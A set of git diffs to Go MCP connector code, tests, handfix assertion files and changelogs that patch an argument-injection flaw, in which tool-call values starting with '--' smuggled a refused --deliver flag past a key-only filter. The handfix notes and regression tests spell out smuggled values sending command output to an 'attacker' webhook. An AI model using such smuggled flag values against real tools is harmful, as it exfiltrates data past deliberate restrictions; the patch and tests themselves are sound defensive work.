+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/knowbe4/handfixes.json
+++ b/skills/knowbe4/handfixes.json
@@ -207,8 +207,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -218,7 +230,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/knowbe4/handfixes.json
+++ b/skills/knowbe4/handfixes.json
@@ -192,6 +192,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/levelio/CHANGELOG.md
+++ b/skills/levelio/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26
 

--- a/skills/levelio/CHANGELOG.md
+++ b/skills/levelio/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/levelio/CHANGELOG.md
+++ b/skills/levelio/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-08-26
 
 ### Changed

--- a/skills/levelio/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/levelio/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/levelio/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/levelio/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/levelio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/levelio/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/levelio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/levelio/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/levelio/cli/internal/mcp/intents.go
+++ b/skills/levelio/cli/internal/mcp/intents.go
@@ -74,10 +74,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/levelio/handfixes.json
+++ b/skills/levelio/handfixes.json
@@ -167,6 +167,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/levelio/handfixes.json
+++ b/skills/levelio/handfixes.json
@@ -182,8 +182,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -193,7 +205,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/liongard/CHANGELOG.md
+++ b/skills/liongard/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/liongard/CHANGELOG.md
+++ b/skills/liongard/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/liongard/CHANGELOG.md
+++ b/skills/liongard/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/liongard/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/liongard/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/liongard/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/liongard/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/liongard/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/liongard/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/liongard/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/liongard/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/liongard/cli/internal/mcp/intents.go
+++ b/skills/liongard/cli/internal/mcp/intents.go
@@ -75,10 +75,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
